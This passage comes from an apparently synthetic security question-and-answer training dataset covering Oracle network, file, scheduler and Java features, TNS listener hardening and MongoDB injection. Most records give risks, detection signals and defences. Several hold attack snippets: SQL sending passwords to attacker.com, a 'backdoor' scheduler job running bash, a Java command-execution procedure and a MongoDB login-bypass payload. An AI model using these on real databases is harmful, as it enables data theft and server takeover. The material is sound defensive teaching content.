server\n- ACL grant changes\n- Network package function calls", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_http-and-network-packages", "license": "original", "retrieved_at": "2025-12-17T19:35:42.154693Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.154789Z", "updated_at": "2025-12-17T19:35:42.154789Z"} +{"id": "trtp-1c3975b41203", "instruction": "How can organizations protect against Oracle UTL_HTTP and Network Packages?", "output": "Security controls and preventive measures for Oracle UTL_HTTP and Network Packages:\n\n- Configure restrictive ACLs\n- Revoke EXECUTE on network packages\n- Block outbound database connections\n- Monitor network package usage\n\nNetwork packages enable database-initiated connections. Combined with SQL injection, attackers can exfiltrate data via HTTP, send SMTP messages, or establish command channels. 
ACLs are often misconfigured.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_http-and-network-packages", "license": "original", "retrieved_at": "2025-12-17T19:35:42.154693Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.154800Z", "updated_at": "2025-12-17T19:35:42.154800Z"} +{"id": "trtp-4a9b20e425c3", "instruction": "Show an example of Oracle UTL_HTTP and Network Packages.", "output": "Example of Oracle UTL_HTTP and Network Packages:\n\n```sql\n-- Data exfiltration via HTTP:\nSELECT UTL_HTTP.REQUEST('http://attacker.com/?data='||password) FROM users;\n\n-- Using HTTPURITYPE:\nSELECT HTTPURITYPE('http://attacker.com/'||password).GETCLOB() FROM users;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_http-and-network-packages", "license": "original", "retrieved_at": "2025-12-17T19:35:42.154693Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.154810Z", "updated_at": "2025-12-17T19:35:42.154810Z"} +{"id": "trtp-2aafe8ea79ee", "instruction": "What do security professionals need to know about Oracle UTL_FILE for File Access?", "output": "UTL_FILE package provides file I/O capabilities in Oracle. With proper directory objects and privileges, attackers can read and write files on the database server, including configuration files and potential webshells.\n\nSecurity Relevance: UTL_FILE enables filesystem access through SQL. Directory objects control access paths. 
Misconfigured directories with broad access enable attackers to read sensitive files or write backdoors.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_file-for-file-access", "license": "original", "retrieved_at": "2025-12-17T19:35:42.156714Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.156768Z", "updated_at": "2025-12-17T19:35:42.156768Z"} +{"id": "trtp-ee0e8704e19c", "instruction": "What are the key components of Oracle UTL_FILE for File Access?", "output": "Oracle UTL_FILE for File Access consists of the following key components:\n\n- UTL_FILE package\n- DIRECTORY objects\n- READ/WRITE directory privileges\n- UTL_FILE_DIR parameter (deprecated)\n- File operations (FOPEN, PUT_LINE, GET_LINE)", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_file-for-file-access", "license": "original", "retrieved_at": "2025-12-17T19:35:42.156714Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.156835Z", "updated_at": "2025-12-17T19:35:42.156835Z"} +{"id": "trtp-91db1b62b792", "instruction": "What security risks are associated with Oracle UTL_FILE for File Access?", "output": "UTL_FILE enables filesystem access through SQL. Directory objects control access paths. 
Misconfigured directories with broad access enable attackers to read sensitive files or write backdoors.\n\nCommon attack vectors include:\n- Read configuration files\n- Write webshells to web directories\n- Read Oracle password files\n- Data exfiltration to accessible paths", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_file-for-file-access", "license": "original", "retrieved_at": "2025-12-17T19:35:42.156714Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.156850Z", "updated_at": "2025-12-17T19:35:42.156850Z"} +{"id": "trtp-464fb6005c50", "instruction": "What are common attack techniques involving Oracle UTL_FILE for File Access?", "output": "Attack techniques involving Oracle UTL_FILE for File Access:\n\n- Read configuration files\n- Write webshells to web directories\n- Read Oracle password files\n- Data exfiltration to accessible paths\n\nDefenders can detect these attacks by:\n- UTL_FILE function calls\n- Directory object creation\n- File operations in audit logs", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_file-for-file-access", "license": "original", "retrieved_at": "2025-12-17T19:35:42.156714Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.156864Z", "updated_at": "2025-12-17T19:35:42.156864Z"} +{"id": "trtp-0074ead78b68", "instruction": "What should analysts look for when monitoring for Oracle UTL_FILE for File Access?", "output": "Methods for detecting Oracle UTL_FILE for File Access attacks or anomalies:\n\n- 
UTL_FILE function calls\n- Directory object creation\n- File operations in audit logs\n- Unusual file access patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_file-for-file-access", "license": "original", "retrieved_at": "2025-12-17T19:35:42.156714Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.156876Z", "updated_at": "2025-12-17T19:35:42.156876Z"} +{"id": "trtp-50af86bbd7f6", "instruction": "How can organizations protect against Oracle UTL_FILE for File Access?", "output": "Security controls and preventive measures for Oracle UTL_FILE for File Access:\n\n- Restrict directory object creation\n- Limit directory paths\n- Revoke UTL_FILE EXECUTE\n- Audit UTL_FILE usage\n\nUTL_FILE enables filesystem access through SQL. Directory objects control access paths. 
Misconfigured directories with broad access enable attackers to read sensitive files or write backdoors.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_file-for-file-access", "license": "original", "retrieved_at": "2025-12-17T19:35:42.156714Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.156889Z", "updated_at": "2025-12-17T19:35:42.156889Z"} +{"id": "trtp-a16724105508", "instruction": "What is the syntax for Oracle UTL_FILE for File Access?", "output": "Example of Oracle UTL_FILE for File Access:\n\n```sql\n-- Create directory object:\nCREATE OR REPLACE DIRECTORY ext_dir AS '/tmp';\nGRANT READ, WRITE ON DIRECTORY ext_dir TO attacker;\n\n-- Read file:\nDECLARE\n f UTL_FILE.FILE_TYPE;\n line VARCHAR2(4000);\nBEGIN\n f := UTL_FILE.FOPEN('EXT_DIR', 'target.txt', 'R');\n UTL_FILE.GET_LINE(f, line);\n DBMS_OUTPUT.PUT_LINE(line);\n UTL_FILE.FCLOSE(f);\nEND;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_file-for-file-access", "license": "original", "retrieved_at": "2025-12-17T19:35:42.156714Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.156899Z", "updated_at": "2025-12-17T19:35:42.156899Z"} +{"id": "trtp-9614d04dd715", "instruction": "What do security professionals need to know about Oracle DBMS_SCHEDULER for Code Execution?", "output": "DBMS_SCHEDULER enables job scheduling in Oracle. Attackers create malicious jobs for command execution, persistence, and privilege escalation. 
Scheduler jobs run with elevated privileges.\n\nSecurity Relevance: DBMS_SCHEDULER can execute OS commands via external jobs. Combined with SQL injection, attackers establish persistence and execute arbitrary code. Jobs survive database restarts.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-dbms_scheduler-for-code-execution", "license": "original", "retrieved_at": "2025-12-17T19:35:42.159111Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.159181Z", "updated_at": "2025-12-17T19:35:42.159181Z"} +{"id": "trtp-ae282554dd85", "instruction": "What elements make up Oracle DBMS_SCHEDULER for Code Execution?", "output": "Oracle DBMS_SCHEDULER for Code Execution consists of the following key components:\n\n- DBMS_SCHEDULER package\n- Job types (executable, PL/SQL)\n- Program and schedule objects\n- Credential objects\n- External job execution", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-dbms_scheduler-for-code-execution", "license": "original", "retrieved_at": "2025-12-17T19:35:42.159111Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.159233Z", "updated_at": "2025-12-17T19:35:42.159233Z"} +{"id": "trtp-1e67ba7ff9d3", "instruction": "What security risks are associated with Oracle DBMS_SCHEDULER for Code Execution?", "output": "DBMS_SCHEDULER can execute OS commands via external jobs. Combined with SQL injection, attackers establish persistence and execute arbitrary code. 
Jobs survive database restarts.\n\nCommon attack vectors include:\n- OS command execution via external jobs\n- Persistence through scheduled jobs\n- Privilege escalation via job credentials\n- Remote code execution", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-dbms_scheduler-for-code-execution", "license": "original", "retrieved_at": "2025-12-17T19:35:42.159111Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.159248Z", "updated_at": "2025-12-17T19:35:42.159248Z"} +{"id": "trtp-a78f8b851966", "instruction": "How do attackers abuse Oracle DBMS_SCHEDULER for Code Execution?", "output": "Attack techniques involving Oracle DBMS_SCHEDULER for Code Execution:\n\n- OS command execution via external jobs\n- Persistence through scheduled jobs\n- Privilege escalation via job credentials\n- Remote code execution\n\nDefenders can detect these attacks by:\n- Job creation events\n- External job execution\n- Unusual scheduler activity", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-dbms_scheduler-for-code-execution", "license": "original", "retrieved_at": "2025-12-17T19:35:42.159111Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.159262Z", "updated_at": "2025-12-17T19:35:42.159262Z"} +{"id": "trtp-86e098e056c8", "instruction": "What indicators reveal malicious activity involving Oracle DBMS_SCHEDULER for Code Execution?", "output": "Methods for detecting Oracle DBMS_SCHEDULER for Code Execution attacks or anomalies:\n\n- Job creation events\n- 
External job execution\n- Unusual scheduler activity\n- Job credential changes", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-dbms_scheduler-for-code-execution", "license": "original", "retrieved_at": "2025-12-17T19:35:42.159111Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.159273Z", "updated_at": "2025-12-17T19:35:42.159273Z"} +{"id": "trtp-ee6d375c804b", "instruction": "What security controls mitigate Oracle DBMS_SCHEDULER for Code Execution risks?", "output": "Security controls and preventive measures for Oracle DBMS_SCHEDULER for Code Execution:\n\n- Restrict CREATE JOB privilege\n- Disable external job execution\n- Monitor scheduler activity\n- Audit job creation/modification\n\nDBMS_SCHEDULER can execute OS commands via external jobs. Combined with SQL injection, attackers establish persistence and execute arbitrary code. 
Jobs survive database restarts.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-dbms_scheduler-for-code-execution", "license": "original", "retrieved_at": "2025-12-17T19:35:42.159111Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.159285Z", "updated_at": "2025-12-17T19:35:42.159285Z"} +{"id": "trtp-f4339b5087d1", "instruction": "Provide a code example for Oracle DBMS_SCHEDULER for Code Execution.", "output": "Example of Oracle DBMS_SCHEDULER for Code Execution:\n\n```sql\n-- Create external job for command execution:\nBEGIN\n DBMS_SCHEDULER.CREATE_JOB(\n job_name => 'backdoor',\n job_type => 'EXECUTABLE',\n job_action => '/bin/bash',\n number_of_arguments => 2,\n enabled => FALSE\n );\n DBMS_SCHEDULER.SET_JOB_ARGUMENT_VALUE('backdoor', 1, '-c');\n DBMS_SCHEDULER.SET_JOB_ARGUMENT_VALUE('backdoor', 2, 'whoami > /tmp/pwned');\n DBMS_SCHEDULER.ENABLE('backdoor');\nEND;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-dbms_scheduler-for-code-execution", "license": "original", "retrieved_at": "2025-12-17T19:35:42.159111Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.159305Z", "updated_at": "2025-12-17T19:35:42.159305Z"} +{"id": "trtp-01573416ef76", "instruction": "What is Oracle Java Stored Procedures and why is it important for database security?", "output": "Oracle supports Java stored procedures that run within the database JVM. 
Java provides powerful capabilities including file I/O, network access, and process execution - dangerous when exploited.\n\nSecurity Relevance: Java stored procedures can execute arbitrary code with OS-level access. The Java permissions model can be bypassed or misconfigured. Java provides capabilities beyond PL/SQL.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-java-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.161170Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.161200Z", "updated_at": "2025-12-17T19:35:42.161200Z"} +{"id": "trtp-e2b703a72db0", "instruction": "What elements make up Oracle Java Stored Procedures?", "output": "Oracle Java Stored Procedures consists of the following key components:\n\n- Oracle JVM (OJVM)\n- loadjava utility\n- Java permissions model\n- DBMS_JAVA package\n- Java Runtime.exec()", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-java-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.161170Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.161219Z", "updated_at": "2025-12-17T19:35:42.161219Z"} +{"id": "trtp-9eb005297d4c", "instruction": "What security risks are associated with Oracle Java Stored Procedures?", "output": "Java stored procedures can execute arbitrary code with OS-level access. The Java permissions model can be bypassed or misconfigured. 
Java provides capabilities beyond PL/SQL.\n\nCommon attack vectors include:\n- Runtime.exec() for command execution\n- File operations through Java I/O\n- Network operations via Java sockets\n- Permission bypass techniques", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-java-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.161170Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.161234Z", "updated_at": "2025-12-17T19:35:42.161234Z"} +{"id": "trtp-8714605d994a", "instruction": "What attacks exploit Oracle Java Stored Procedures?", "output": "Attack techniques involving Oracle Java Stored Procedures:\n\n- Runtime.exec() for command execution\n- File operations through Java I/O\n- Network operations via Java sockets\n- Permission bypass techniques\n\nDefenders can detect these attacks by:\n- Java source/class loading\n- Java execution privileges\n- DBMS_JAVA usage", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-java-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.161170Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.161248Z", "updated_at": "2025-12-17T19:35:42.161248Z"} +{"id": "trtp-eda0f351db8e", "instruction": "What log entries indicate Oracle Java Stored Procedures attacks?", "output": "Methods for detecting Oracle Java Stored Procedures attacks or anomalies:\n\n- Java source/class loading\n- Java execution privileges\n- DBMS_JAVA usage\n- JVM process spawning", 
"category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-java-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.161170Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.161259Z", "updated_at": "2025-12-17T19:35:42.161259Z"} +{"id": "trtp-d8a346576124", "instruction": "How do you defend against Oracle Java Stored Procedures attacks?", "output": "Security controls and preventive measures for Oracle Java Stored Procedures:\n\n- Restrict Java privileges\n- Remove OJVM if not needed\n- Monitor loadjava usage\n- Audit Java permission grants\n\nJava stored procedures can execute arbitrary code with OS-level access. The Java permissions model can be bypassed or misconfigured. Java provides capabilities beyond PL/SQL.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-java-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.161170Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.161271Z", "updated_at": "2025-12-17T19:35:42.161271Z"} +{"id": "trtp-aa4b320a8e69", "instruction": "What does Oracle Java Stored Procedures look like in SQL?", "output": "Example of Oracle Java Stored Procedures:\n\n```sql\n-- Java procedure for command execution:\nCREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED \"ExecCmd\" AS\nimport java.io.*;\npublic class ExecCmd {\n public static String exec(String cmd) throws Exception {\n Process p = Runtime.getRuntime().exec(cmd);\n BufferedReader br = new BufferedReader(new 
InputStreamReader(p.getInputStream()));\n StringBuilder sb = new StringBuilder();\n String line;\n while ((line = br.readLine()) != null) sb.append(line);\n return sb.toString();\n }\n};\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-java-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.161170Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.161282Z", "updated_at": "2025-12-17T19:35:42.161282Z"} +{"id": "trtp-c87e640de644", "instruction": "How does Oracle TNS Listener Security work and what are its security implications?", "output": "The TNS Listener handles Oracle client connections. TNS Poisoning and listener exploitation can redirect connections, intercept credentials, or cause denial of service. Listener security is often overlooked.\n\nSecurity Relevance: TNS Poisoning enables man-in-the-middle attacks against Oracle connections. Unprotected listeners can be remotely administered. 
Dynamic registration can be abused to redirect connections.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-tns-listener-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.163017Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.163046Z", "updated_at": "2025-12-17T19:35:42.163046Z"} +{"id": "trtp-30c79d3f145a", "instruction": "What are the main parts of Oracle TNS Listener Security that security teams should understand?", "output": "Oracle TNS Listener Security consists of the following key components:\n\n- TNS Listener service\n- listener.ora configuration\n- Dynamic registration\n- ADMIN_RESTRICTIONS\n- Local OS authentication", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-tns-listener-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.163017Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.163066Z", "updated_at": "2025-12-17T19:35:42.163066Z"} +{"id": "trtp-85efff04b2de", "instruction": "What security risks are associated with Oracle TNS Listener Security?", "output": "TNS Poisoning enables man-in-the-middle attacks against Oracle connections. Unprotected listeners can be remotely administered. 
Dynamic registration can be abused to redirect connections.\n\nCommon attack vectors include:\n- TNS Poisoning for connection hijacking\n- Remote listener administration\n- Service registration attacks\n- Password interception", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-tns-listener-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.163017Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.163081Z", "updated_at": "2025-12-17T19:35:42.163081Z"} +{"id": "trtp-e76dec0a6a6b", "instruction": "What threats are associated with Oracle TNS Listener Security?", "output": "Attack techniques involving Oracle TNS Listener Security:\n\n- TNS Poisoning for connection hijacking\n- Remote listener administration\n- Service registration attacks\n- Password interception\n\nDefenders can detect these attacks by:\n- Unauthorized listener commands\n- Unexpected service registrations\n- Listener log analysis", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-tns-listener-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.163017Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.163094Z", "updated_at": "2025-12-17T19:35:42.163094Z"} +{"id": "trtp-a4713bf004c7", "instruction": "What log entries indicate Oracle TNS Listener Security attacks?", "output": "Methods for detecting Oracle TNS Listener Security attacks or anomalies:\n\n- Unauthorized listener commands\n- Unexpected service registrations\n- Listener log analysis\n- 
Connection pattern anomalies", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-tns-listener-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.163017Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.163106Z", "updated_at": "2025-12-17T19:35:42.163106Z"} +{"id": "trtp-6ad2cfd43d6b", "instruction": "What preventive measures address Oracle TNS Listener Security vulnerabilities?", "output": "Security controls and preventive measures for Oracle TNS Listener Security:\n\n- Enable ADMIN_RESTRICTIONS\n- Use LOCAL_OS_AUTHENTICATION\n- Restrict dynamic registration\n- Enable listener logging\n\nTNS Poisoning enables man-in-the-middle attacks against Oracle connections. Unprotected listeners can be remotely administered. Dynamic registration can be abused to redirect connections.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-tns-listener-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.163017Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.163117Z", "updated_at": "2025-12-17T19:35:42.163117Z"} +{"id": "trtp-cd3f5ed05ae1", "instruction": "Provide a code example for Oracle TNS Listener Security.", "output": "Example of Oracle TNS Listener Security:\n\n```sql\n# Secure listener.ora:\nLISTENER =\n (DESCRIPTION =\n (ADDRESS = (PROTOCOL = TCP)(HOST = localhost)(PORT = 1521))\n )\n\nADMIN_RESTRICTIONS_LISTENER = ON\nSECURE_REGISTER_LISTENER = (IPC)\nSECURE_CONTROL_LISTENER = (IPC)\n```", "category": "database_security", "team": 
"foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-tns-listener-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.163017Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.163127Z", "updated_at": "2025-12-17T19:35:42.163127Z"} +{"id": "trtp-b1437ea94eaf", "instruction": "Explain MongoDB Injection from a security perspective.", "output": "MongoDB injection exploits occur when user input is incorporated into MongoDB queries without proper sanitization. Unlike SQL, MongoDB uses JSON/BSON queries with operators like $gt, $ne, $where that can be injected.\n\nSecurity Relevance: MongoDB injection bypasses authentication, extracts data, and in some cases enables code execution. Developers incorrectly assume NoSQL is immune to injection. Modern frameworks may still be vulnerable.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.164844Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.164873Z", "updated_at": "2025-12-17T19:35:42.164873Z"} +{"id": "trtp-1d59773aebbb", "instruction": "What are the key components of MongoDB Injection?", "output": "MongoDB Injection consists of the following key components:\n\n- Query operator injection ($gt, $ne, $or)\n- JavaScript execution ($where)\n- JSON parsing vulnerabilities\n- Array operator abuse\n- Aggregation pipeline injection", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": 
"database-security-nosql-mongodb-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.164844Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.164893Z", "updated_at": "2025-12-17T19:35:42.164893Z"} +{"id": "trtp-b2eea1f3e011", "instruction": "How can MongoDB Injection lead to database security incidents?", "output": "MongoDB injection bypasses authentication, extracts data, and in some cases enables code execution. Developers incorrectly assume NoSQL is immune to injection. Modern frameworks may still be vulnerable.\n\nCommon attack vectors include:\n- Auth bypass: {\"password\": {\"$ne\": \"\"}}\n- Data extraction: {\"$gt\": \"\"}\n- $where JavaScript injection\n- Regex-based data extraction\n- Aggregation pipeline manipulation", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.164844Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.164908Z", "updated_at": "2025-12-17T19:35:42.164908Z"} +{"id": "trtp-cfc1e20ada53", "instruction": "What threats are associated with MongoDB Injection?", "output": "Attack techniques involving MongoDB Injection:\n\n- Auth bypass: {\"password\": {\"$ne\": \"\"}}\n- Data extraction: {\"$gt\": \"\"}\n- $where JavaScript injection\n- Regex-based data extraction\n- Aggregation pipeline manipulation\n\nDefenders can detect these attacks by:\n- Query operators in user input\n- JSON parsing errors\n- $where clause usage", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", 
"source_id": "database-security-nosql-mongodb-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.164844Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.164923Z", "updated_at": "2025-12-17T19:35:42.164923Z"} +{"id": "trtp-f3261740ed52", "instruction": "What indicators reveal malicious activity involving MongoDB Injection?", "output": "Methods for detecting MongoDB Injection attacks or anomalies:\n\n- Query operators in user input\n- JSON parsing errors\n- $where clause usage\n- Unusual query patterns\n- Authentication anomalies", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.164844Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.164935Z", "updated_at": "2025-12-17T19:35:42.164935Z"} +{"id": "trtp-bf1af2280502", "instruction": "What preventive measures address MongoDB Injection vulnerabilities?", "output": "Security controls and preventive measures for MongoDB Injection:\n\n- Validate input types strictly\n- Disable $where if not needed\n- Use driver query builders\n- Implement schema validation\n- Sanitize JSON input\n\nMongoDB injection bypasses authentication, extracts data, and in some cases enables code execution. Developers incorrectly assume NoSQL is immune to injection. 
